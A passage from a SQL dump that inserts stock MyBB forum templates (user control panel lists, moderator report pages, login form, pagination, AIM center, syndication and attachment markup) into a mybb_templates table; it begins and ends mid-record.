valign=\"top\" style=\"white-space: nowrap; text-align: center;\">{$threads}</td>\n<td class=\"trow2\" valign=\"top\" style=\"white-space: nowrap\">{$lastpost}</td>\n</tr>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('218', 'usercp_latest_subscribed', '<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"6\"><div class=\"float_right\"><a href=\"usercp.php?action=subscriptions\"><strong>{$lang->view_all_subscriptions}</strong></a></div><strong>{$lang->new_thread_subscriptions}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" colspan=\"3\"><span class=\"smalltext\"><strong>{$lang->thread} / {$lang->author}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"75\"><span class=\"smalltext\"><strong>{$lang->replies}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"75\"><span class=\"smalltext\"><strong>{$lang->views}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"200\"><span class=\"smalltext\"><strong>{$lang->lastpost}</strong></span></td>\n</tr>\n{$latest_subscribed_threads}\n</table>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('219', 'usercp_latest_subscribed_threads', '<tr>\n<td align=\"center\" class=\"{$bgcolor}\" width=\"2%\"><img src=\"{$theme[\'imgdir\']}/{$folder}.gif\" alt=\"{$folder_label}\" title=\"{$folder_label}\" /></td>\n<td align=\"center\" class=\"{$bgcolor}\" width=\"2%\">{$icon}</td>\n<td class=\"{$bgcolor}\">{$gotounread}{$thread[\'displayprefix\']}<a href=\"{$thread[\'threadlink\']}\" class=\"{$new_class}\">{$thread[\'subject\']}</a><br /><span class=\"smalltext\">{$thread[\'author\']}</span></td>\n<td align=\"center\" class=\"{$bgcolor}\"><a href=\"javascript:MyBB.whoPosted({$thread[\'tid\']});\">{$thread[\'replies\']}</a></td>\n<td align=\"center\" class=\"{$bgcolor}\">{$thread[\'views\']}</td>\n<td class=\"{$bgcolor}\" style=\"white-space: nowrap\"><span class=\"smalltext\">{$lastpostdate} {$lastposttime}\n<br /><a href=\"{$thread[\'lastpostlink\']}\">{$lang->lastpost}</a>: {$lastposterlink}</span>\n</td>\n</tr>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('220', 'usercp_latest_threads', '<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"6\"><div class=\"float_right\"><a href=\"search.php?action=finduserthreads&amp;uid={$mybb->user[\'uid\']}\"><strong>{$lang->find_all_threads}</strong></a></div><strong>{$lang->latest_threads}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" colspan=\"3\"><span class=\"smalltext\"><strong>{$lang->thread} / {$lang->author}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"75\"><span class=\"smalltext\"><strong>{$lang->replies}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"75\"><span class=\"smalltext\"><strong>{$lang->views}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"200\"><span class=\"smalltext\"><strong>{$lang->lastpost}</strong></span></td>\n</tr>\n{$latest_threads_threads}\n</table>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('221', 'usercp_latest_threads_threads', '<tr>\n<td align=\"center\" class=\"{$bgcolor}\" width=\"2%\"><img src=\"{$theme[\'imgdir\']}/{$folder}.gif\" alt=\"{$folder_label}\" title=\"{$folder_label}\" /></td>\n<td align=\"center\" class=\"{$bgcolor}\" width=\"2%\">{$icon}</td>\n<td class=\"{$bgcolor}\">{$gotounread}{$thread[\'displayprefix\']}<a href=\"{$thread[\'threadlink\']}\" class=\"{$new_class}\">{$thread[\'subject\']}</a><br /><span class=\"smalltext\">{$thread[\'author\']}</span></td>\n<td align=\"center\" class=\"{$bgcolor}\"><a href=\"javascript:MyBB.whoPosted({$thread[\'tid\']});\">{$thread[\'replies\']}</a></td>\n<td align=\"center\" class=\"{$bgcolor}\">{$thread[\'views\']}</td>\n<td class=\"{$bgcolor}\" style=\"white-space: nowrap\"><span class=\"smalltext\">{$lastpostdate} {$lastposttime}\n<br /><a href=\"{$thread[\'lastpostlink\']}\">{$lang->lastpost}</a>: {$lastposterlink}</span>\n</td>\n</tr>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('222', 'newthread_postpoll', '<tr>\n<td class=\"{$bgcolor2}\" valign=\"top\">\n<strong>{$lang->poll}</strong><br /><span class=\"smalltext\">{$lang->poll_desc}</span>\n</td>\n<td class=\"{$bgcolor2}\" valign=\"top\">\n<span class=\"smalltext\"><label><input type=\"checkbox\" class=\"checkbox\" name=\"postpoll\" value=\"1\" {$postpollchecked} /><strong>{$lang->poll_check}</strong></label><br />\n{$lang->num_options} <input type=\"text\" class=\"textbox\" name=\"numpolloptions\" value=\"{$numpolloptions}\" size=\"10\" /> {$lang->max_options}</span>\n</td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('223', 'modcp_reports_report', '<tr>\n<td class=\"{$trow}\" align=\"center\"><label for=\"reports_{$report[\'rid\']}\"><a href=\"{$report[\'postlink\']}#pid{$report[\'pid\']}\" target=\"_blank\">{$report[\'pid\']}</a></label></td>\n<td class=\"{$trow}\" align=\"center\"><a href=\"{$report[\'posterlink\']}\" target=\"_blank\">{$report[\'postusername\']}</a></td>\n<td class=\"{$trow}\"><a href=\"{$report[\'threadlink\']}\" target=\"_blank\">{$report[\'threadsubject\']}</a></td>\n<td class=\"{$trow}\" align=\"center\"><a href=\"{$report[\'reporterlink\']}\" target=\"_blank\">{$report[\'username\']}</a></td>\n<td class=\"{$trow}\">{$report[\'reason\']}</td>\n<td class=\"{$trow}\" align=\"center\" style=\"white-space: nowrap\"><span class=\"smalltext\">{$reportdate}<br />{$reporttime}</small></td>\n<td class=\"{$trow}\" align=\"center\"><input type=\"checkbox\" class=\"checkbox\" name=\"reports[]\" id=\"reports_{$report[\'rid\']}\" value=\"{$report[\'rid\']}\" /></td>\n</tr>', '-2', '1607', '', '1339729416'); INSERT INTO mybb_templates VALUES('224', 'modcp_reports_multipage', '<tr>\n<td class=\"tcat\" colspan=\"6\"><span class=\"smalltext\"> {$multipage}</span></td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('225', 'modcp_allreports', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->all_reported_posts}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$modcp_nav}\n<td valign=\"top\">\n<p>{$lang->unread_reports_key}</p>\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" align=\"center\" colspan=\"6\"><strong>{$lang->all_reported_posts}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" align=\"center\" width=\"10%\"><span class=\"smalltext\"><strong>{$lang->post_id}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"15%\"><span class=\"smalltext\"><strong>{$lang->poster}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"25%\"><span class=\"smalltext\"><strong>{$lang->thread}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"15%\"><span class=\"smalltext\"><strong>{$lang->reporter}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"25%\"><span class=\"smalltext\"><strong>{$lang->report_reason}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"10%\"><span class=\"smalltext\"><strong>{$lang->report_time}</strong></span></td>\n</tr>\n{$allreports}\n{$allreportspages}\n</table>\n</td>\n</tr>\n</table>\n{$footer}\n</body>\n</html>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('226', 'modcp_reports_allreport', '<tr>\n<td class=\"{$trow}\" align=\"center\"><a href=\"{$report[\'postlink\']}#pid{$report[\'pid\']}\" target=\"_blank\">{$report[\'pid\']}</a></td>\n<td class=\"{$trow}\" align=\"center\">{$report[\'postusername\']}</td>\n<td class=\"{$trow}\">{$report[\'threadsubject\']}</td>\n<td class=\"{$trow}\" align=\"center\"><a href=\"{$report[\'reporterlink\']}\" target=\"_blank\">{$report[\'username\']}</a></td>\n<td class=\"{$trow}\">{$report[\'reason\']}</td>\n<td class=\"{$trow}\" align=\"center\" style=\"white-space: nowrap\"><span class=\"smalltext\">{$reportdate}<br />{$reporttime}</span></td>\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('227', 'modcp_reports_allnoreports', '<tr>\n<td class=\"trow1\" align=\"center\" colspan=\"6\">{$lang->no_reports}</td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('228', 'modcp_reports_noreports', '<tr>\n<td class=\"trow1\" align=\"center\" colspan=\"7\">{$lang->no_reports}</td>\n</tr>', '-2', '1607', '', '1339729416'); INSERT INTO mybb_templates VALUES('229', 'global_unreadreports', '<div class=\"red_alert\"><a href=\"modcp.php?action=reports\">{$lang->unread_reports}</a></div>\n<br />', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('230', 'global_pending_joinrequests', '<div class=\"red_alert\"><a href=\"usercp.php?action=usergroups\">{$lang->pending_joinrequests}</a></div>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('231', 'member_loggedin_notice', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"trow1\" align=\"right\"><span class=\"smalltext\">{$lang->already_logged_in}</a></span></td>\n</tr>\n</table>\n<br />', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('232', 'member_login', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->login}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<br />\n{$inline_errors}\n{$member_loggedin_notice}\n<form action=\"member.php\" method=\"post\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->login}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\"><strong>{$lang->username}</strong></td>\n<td class=\"trow1\"><input type=\"text\" class=\"textbox\" name=\"username\" size=\"25\" maxlength=\"{$mybb->settings[\'maxnamelength\']}\" style=\"width: 200px;\" value=\"{$username}\" /></td>\n</tr>\n<tr>\n<td class=\"trow2\"><strong>{$lang->password}</strong><br /><span class=\"smalltext\">{$lang->pw_note}</span></td>\n<td class=\"trow2\"><input type=\"password\" class=\"textbox\" name=\"password\" size=\"25\" style=\"width: 200px;\" value=\"{$password}\" /> (<a href=\"member.php?action=lostpw\">{$lang->lostpw_note}</a>)</td>\n</tr>\n<tr>\n<td class=\"trow1\" colspan=\"2\" align=\"center\"><label title=\"{$lang->remember_me_desc}\"><input type=\"checkbox\" class=\"checkbox\" name=\"remember\" checked=\"checked\" value=\"yes\" /> {$lang->remember_me}</label></td>\n</tr>\n{$captcha}\n</table>\n<br />\n<div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->login}\" /></div>\n<input type=\"hidden\" name=\"action\" value=\"do_login\" />\n<input type=\"hidden\" name=\"url\" value=\"{$redirect_url}\" />\n</form>\n{$footer}\n</body>\n</html>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('233', 'misc_imcenter_aim', '<html>\n<head>\n<title>{$lang->aim_center}</title>\n{$headerinclude}\n</head>\n<body style=\"margin:0;left:0;top:0\" class=\"trow2\">\n<table width=\"100%\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" border=\"0\" align=\"center\" class=\"tborder\">\n<tr>\n<td class=\"thead\" align=\"center\" colspan=\"2\"><strong>{$user[\'username\']} - {$lang->aim_center}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" align=\"center\" colspan=\"2\"><span class=\"smalltext\"><strong>{$navigationbar}</strong></span></td>\n</tr>\n<tr>\n<td class=\"trow2\">\n<!-- Begin AIM Remote -->\n<table align=\"center\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tr>\n<td align=\"center\" style=\"white-space: nowrap\"><a href=\"http://www.aol.co.uk/aim/index.html\"><img src=\"http://www.aol.co.uk/aim/remote/gr/aimver_man.gif\" width=\"44\" height=\"55\" alt=\"($lang->download_aim}\" title=\"($lang->download_aim}\" /></a><img src=\"http://www.aol.co.uk/aim/remote/gr/aimver_topsm.gif\" width=\"73\" height=\"55\" alt=\"{$lang->aim_remote}\" title=\"{$lang->aim_remote}\" /></td>\n</tr>\n<tr>\n<td align=\"center\" style=\"white-space: nowrap\"><a href=\"aim:goim?screenname={$user[\'aim\']}&amp;message=Hi.+Are+you+there?\"><img src=\"http://www.aol.co.uk/aim/remote/gr/aimver_im.gif\" width=\"117\" height=\"39\" alt=\"{$lang->send_me_instant}\" title=\"{$lang->send_me_instant}\" /></a></td>\n</tr>\n<tr>\n<td align=\"center\" style=\"white-space: nowrap\"><a href=\"aim:addbuddy?screenname={$user[\'aim\']}\"><img src=\"http://www.aol.co.uk/aim/remote/gr/aimver_bud.gif\" width=\"117\" height=\"39\" alt=\"{$lang->add_me_buddy_list}\" title=\"{$lang->add_me_buddy_list}\" /></a></td>\n</tr>\n<tr>\n<td align=\"center\" style=\"white-space: nowrap\"><a href=\"http://www.aol.co.uk/aim/remote.html\"><img src=\"http://www.aol.co.uk/aim/remote/gr/aimver_botadd.gif\" width=\"117\" height=\"23\" alt=\"($lang->add_remote_to_page}\" title=\"($lang->add_remote_to_page}\" /></a></td>\n</tr>\n<td align=\"center\" style=\"white-space: nowrap\"><a href=\"http://www.aol.co.uk/aim/index.html\"><img src=\"http://www.aol.co.uk/aim/remote/gr/aimver_botdow.gif\" width=\"117\" height=\"29\" alt=\"{$lang->download_aol_im}\" title=\"{$lang->download_aol_im}\" /></a></td>\n</tr>\n</table>\n<!-- End AIM Remote -->\n</td>\n</tr>\n</table>\n</body>\n</html>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('234', 'misc_syndication', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->syndication}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n{$feedurl}\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\">\n<tr><td>{$lang->syndication_note}</td></tr>\n</table>\n<br />\n<form method=\"post\" action=\"misc.php?action=syndication\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->syndication}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" width=\"40%\" valign=\"top\"><strong>{$lang->syndication_forum}</strong><br /><span class=\"smalltext\">{$lang->syndication_forum_desc}</span></td>\n<td class=\"trow1\" width=\"60%\">{$forumselect}</td>\n</tr>\n<tr>\n<td class=\"trow2\" width=\"40%\" valign=\"top\"><strong>{$lang->syndication_version}</strong><br /><span class=\"smalltext\">{$lang->syndication_version_desc}</span></td>\n<td class=\"trow2\" width=\"60%\"><input type=\"radio\" class=\"radio\" name=\"version\" value=\"rss2.0\" {$rss2check} />&nbsp;{$lang->syndication_version_rss2}<br /><input type=\"radio\" class=\"radio\" name=\"version\" value=\"atom1.0\" {$atom1check} />&nbsp;{$lang->syndication_version_atom1}</td>\n</tr>\n<tr>\n<td class=\"trow1\" width=\"40%\" valign=\"top\"><strong>{$lang->syndication_limit}</strong><br /><span class=\"smalltext\">{$lang->syndication_limit_desc}</span></td>\n<td class=\"trow1\" width=\"60%\"><input type=\"text\" class=\"textbox\" name=\"limit\" value=\"{$limit}\" size=\"3\" /> {$lang->syndication_threads_time}</td>\n</tr></table>\n<br />\n<div align=\"center\"><input type=\"submit\" class=\"button\" name=\"make\" value=\"{$lang->syndication_generate}\" /></div>\n</form>\n{$footer}\n</body>\n</html>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('235', 'misc_syndication_feedurl', '<table border=\"0\" cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\">\n<tr><td>\n<strong>{$lang->syndication_generated_url}</strong><blockquote>\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"><tr><td class=\"trow1\">\n{$url}\n</td></tr></table>\n</blockquote>\n</td></tr>\n</table>\n<br />', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('236', 'memberlist_user', '<tr>\n <td class=\"{$alt_bg}\" align=\"center\">{$user[\'avatar\']}</td>\n <td class=\"{$alt_bg}\">{$user[\'profilelink\']}<br />\n<span class=\"smalltext\">\n {$user[\'usertitle\']}<br />\n {$usergroup[\'groupimage\']}\n {$user[\'userstars\']}\n</span></td>\n <td class=\"{$alt_bg}\" align=\"center\">{$user[\'regdate\']}</td>\n <td class=\"{$alt_bg}\" align=\"center\">{$user[\'lastvisit\']}</td>\n <td class=\"{$alt_bg}\" align=\"center\">{$user[\'postnum\']}</td>\n {$referral_bit}\n</tr>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('237', 'memberlist_user_avatar', '<img src=\"{$user[\'avatar\']}\" alt=\"\" {$avatar_width_height} />', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('238', 'memberlist_user_groupimage', '<img src=\"{$usergroup[\'image\']}\" alt=\"{$usergroup[\'title\']}\" title=\"{$usergroup[\'title\']}\" />', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('239', 'index_loginform', '<br /><br />\n<form action=\"member.php\" method=\"post\">\n <input type=\"hidden\" name=\"action\" value=\"do_login\" />\n <span class=\"smalltext\"><strong>{$lang->quick_login}</strong></span>\n <input type=\"text\" class=\"textbox\" name=\"username\" title=\"{$login_username}\" value=\"{$lang->login_username}\" onfocus=\"if(this.value == \'{$lang->login_username}\') { this.value=\'\'; }\" onblur=\"if(this.value==\'\') { this.value=\'{$lang->login_username}\'; }\" />\n <input type=\"password\" class=\"textbox\" name=\"password\" title=\"{$lang->login_password}\" value=\"{$lang->login_password}\" onfocus=\"if(this.value == \'{$lang->login_password}\') { this.value=\'\'; }\" onblur=\"if(this.value==\'\') { this.value=\'{$lang->login_password}\'; }\" />\n {$gobutton}\n</form>', '-2', '1607', '', '1339729416'); INSERT INTO mybb_templates VALUES('240', 'multipage_breadcrumb', '<div id=\"breadcrumb_multipage_popup\" class=\"pagination pagination_breadcrumb\" style=\"display: none;\">\n{$prevpage}{$start}{$mppage}{$end}{$nextpage}\n</div>\n<script type=\"text/javascript\">\n// <!--\n if(use_xmlhttprequest == \"1\")\n {\n new PopupMenu(\"breadcrumb_multipage\");\n }\n// -->\n</script>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('241', 'multipage', '<div class=\"pagination\">\n<span class=\"pages\">{$lang->multipage_pages}</span>\n{$prevpage}{$start}{$mppage}{$end}{$nextpage}\n</div>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('242', 'multipage_end', '{$lang->multipage_link_end} <a href=\"{$page_url}\" class=\"pagination_last\">{$pages}</a>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('243', 'multipage_nextpage', '<a href=\"{$page_url}\" class=\"pagination_next\">{$lang->next} &raquo;</a>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('244', 'multipage_page', '<a href=\"{$page_url}\" class=\"pagination_page\">{$i}</a>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('245', 'multipage_page_current', ' <span class=\"pagination_current\">{$i}</span>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('246', 'multipage_page_link_current', ' <a href=\"{$page_url}\" class=\"pagination_current\">{$i}</a>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('247', 'multipage_prevpage', '<a href=\"{$page_url}\" class=\"pagination_previous\">&laquo; {$lang->previous}</a>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('248', 'multipage_start', '<a href=\"{$page_url}\" class=\"pagination_first\">1</a> {$lang->multipage_link_start}', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('249', 'usercp_forumsubscriptions_none', '<tr>\n<td class=\"trow1\" colspan=\"5\">{$lang->no_forum_subscriptions}</td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('250', 'index_whosonline', '<tr>\n<td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->whos_online}</strong> [<a href=\"online.php\">{$lang->complete_list}</a>]</span></td>\n</tr>\n<tr>\n<td class=\"trow1\"><span class=\"smalltext\">{$lang->online_note}<br />{$onlinemembers}</span></td>\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('251', 'index_stats', '<tr><td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->boardstats}</strong></span></td></tr>\n<tr>\n<td class=\"trow1\"><span class=\"smalltext\">\n{$lang->stats_posts_threads}<br />\n{$lang->stats_numusers}<br />\n{$lang->stats_newestuser}<br />\n{$lang->stats_mostonline}\n</span>\n</td>\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('252', 'moderation_deletethread', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->delete_thread}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"moderation.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$thread[\'subject\']} - {$lang->delete_thread}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" colspan=\"2\" align=\"center\">{$lang->confirm_delete_threads}</td>\n</tr>\n{$loginbox}\n</table>\n<br />\n<div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->delete_thread}\" /></div>\n<input type=\"hidden\" name=\"action\" value=\"do_deletethread\" />\n<input type=\"hidden\" name=\"tid\" value=\"{$tid}\" />\n</form>\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('253', 'postbit_attachments_thumbnails', '<span class=\"smalltext\"><strong>{$lang->postbit_attachments_thumbnails}</strong></span><br />\n{$post[\'thumblist\']}\n<br />', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('254', 'forumdisplay_subforums', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"5\" align=\"center\"><strong>{$lang->sub_forums_in}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" width=\"2%\">&nbsp;</td>\n<td class=\"tcat\" width=\"59%\"><span class=\"smalltext\"><strong>{$lang->forumbit_forum}</strong></span></td>\n<td class=\"tcat\" width=\"7%\" align=\"center\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->forumbit_threads}</strong></span></td>\n<td class=\"tcat\" width=\"7%\" align=\"center\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->forumbit_posts}</strong></span></td>\n<td class=\"tcat\" width=\"15%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->forumbit_lastpost}</strong></span></td>\n</tr>\n{$forums}\n</table>\n<br />', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('255', 'forumdisplay_threadlist_rating', ' <td class=\"tcat\" align=\"center\" width=\"80\">\n <span class=\"smalltext\"><strong><a href=\"{$sorturl}&amp;sortby=rating&amp;order=desc\">{$lang->rating}</a> {$orderarrow[\'rating\']}</strong></span>\n <script type=\"text/javascript\" src=\"jscripts/rating.js?ver=1400\"></script>\n <script type=\"text/javascript\">\n <!--\n lang.stars = new Array();\n lang.stars[1] = \"{$lang->one_star}\";\n lang.stars[2] = \"{$lang->two_stars}\";\n lang.stars[3] = \"{$lang->three_stars}\";\n lang.stars[4] = \"{$lang->four_stars}\";\n lang.stars[5] = \"{$lang->five_stars}\";\n // -->\n </script>\n </td>\n', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('256', 'forumdisplay_thread', '<tr>\n <td align=\"center\" class=\"{$bgcolor}{$thread_type_class}\" width=\"2%\"><img src=\"{$theme[\'imgdir\']}/{$folder}.gif\" alt=\"{$folder_label}\" title=\"{$folder_label}\" /></td>\n <td align=\"center\" class=\"{$bgcolor}{$thread_type_class}\" width=\"2%\">{$icon}</td>\n <td class=\"{$bgcolor}{$thread_type_class}\">\n {$attachment_count}\n <div>\n <span>{$prefix} {$gotounread}{$thread[\'threadprefix\']}<a href=\"{$thread[\'threadlink\']}\" class=\"{$inline_edit_class} {$new_class}\" id=\"tid_{$inline_edit_tid}\">{$thread[\'subject\']}</a>{$thread[\'multipage\']}</span>\n <div class=\"author smalltext\">{$thread[\'profilelink\']}</div>\n </div>\n </td>\n <td align=\"center\" class=\"{$bgcolor}{$thread_type_class}\"><a href=\"javascript:MyBB.whoPosted({$thread[\'tid\']});\">{$thread[\'replies\']}</a>{$unapproved_posts}</td>\n <td align=\"center\" class=\"{$bgcolor}{$thread_type_class}\">{$thread[\'views\']}</td>\n {$rating}\n <td class=\"{$bgcolor}{$thread_type_class}\" style=\"white-space: nowrap; text-align: right;\">\n <span class=\"lastpost smalltext\">{$lastpostdate} {$lastposttime}<br />\n <a href=\"{$thread[\'lastpostlink\']}\">{$lang->lastpost}</a>: {$lastposterlink}</span>\n </td>\n{$modbit}\n</tr>\n', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('257', 'forumdisplay_orderarrow', '<span class=\"smalltext\">[<a href=\"{$sorturl}&amp;sortby={$sortby}&amp;order={$oppsortnext}\">{$oppsort}</a>]</span>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('258', 'postbit_posturl', '<div style=\"float: right; width: auto; vertical-align: top\"><span class=\"smalltext\"><strong>{$lang->postbit_post} <a href=\"{$post[\'postlink\']}#pid{$post[\'pid\']}\">#{$postcounter}</a></strong>{$post[\'inlinecheck\']}</span></div>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('259', 'postbit_attachments_thumbnails_thumbnail', '<a href=\"attachment.php?aid={$attachment[\'aid\']}\" target=\"_blank\"><img src=\"attachment.php?thumbnail={$attachment[\'aid\']}\" class=\"attachment\" alt=\"\" /></a>&nbsp;&nbsp;&nbsp;', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('260', 'postbit_attachments_images_image', '<img src=\"attachment.php?aid={$attachment[\'aid\']}\" class=\"attachment\" alt=\"\" />&nbsp;&nbsp;&nbsp;', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('261', 'postbit_signature', '<hr size=\"1\" width=\"25%\" align=\"left\" />\n{$post[\'signature\']}', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('262', 'post_attachments_attachment', '<tr>\n<td class=\"trow2\" width=\"1\" align=\"center\">{$attachment[\'icon\']}</td>\n<td class=\"trow2\" width=\"75%\" style=\"white-space: nowrap\">{$attachment[\'filename\']} ({$attachment[\'size\']})</td>\n<td class=\"trow2\" style=\"white-space: nowrap; text-align: center;\">{$attach_mod_options} {$attach_rem_options} {$postinsert}</td>\n</tr>', '-2', '1604', '', '1339729416'); INSERT INTO mybb_templates VALUES('263', 'post_attachments_attachment_unapproved', '<tr>\n<td class=\"trow_shaded\" width=\"1\" align=\"center\">{$attachment[\'icon\']}</td>\n<td class=\"trow_shaded\" style=\"white-space: nowrap\"><em><a href=\"attachment.php?aid={$attachment[\'aid\']}\" target=\"_blank\">{$attachment[\'filename\']}</a> ({$attachment[\'size\']})</em></td>\n<td class=\"trow_shaded\" style=\"white-space: nowrap; text-align: center;\">{$attach_mod_options} <input type=\"submit\" class=\"button\" name=\"rem\" value=\"{$lang->remove_attachment}\" onclick=\"return Post.removeAttachment({$attachment[\'aid\']});\" /> {$postinsert}</td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('264', 'post_attachments_attachment_mod_approve', '<input type=\"submit\" class=\"button\" name=\"approveattach\" value=\"{$lang->approve_attachment}\" onclick=\"return Post.attachmentAction({$attachment[\'aid\']},\'approve\');\" />', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('265', 'post_attachments_attachment_mod_unapprove', '<input type=\"submit\" class=\"button\" name=\"unapproveattach\" value=\"{$lang->unapprove_attachment}\" onclick=\"return Post.attachmentAction({$attachment[\'aid\']},\'unapprove\');\" />', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('266', 'error_attacherror', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"><tr>\n<td class=\"thead\"><strong>{$lang->error_attach_file}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\">{$attachedfile[\'error\']}</td>\n</tr>\n</table>\n<br />', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('267', 'postbit_attachments', '<br />\n<br 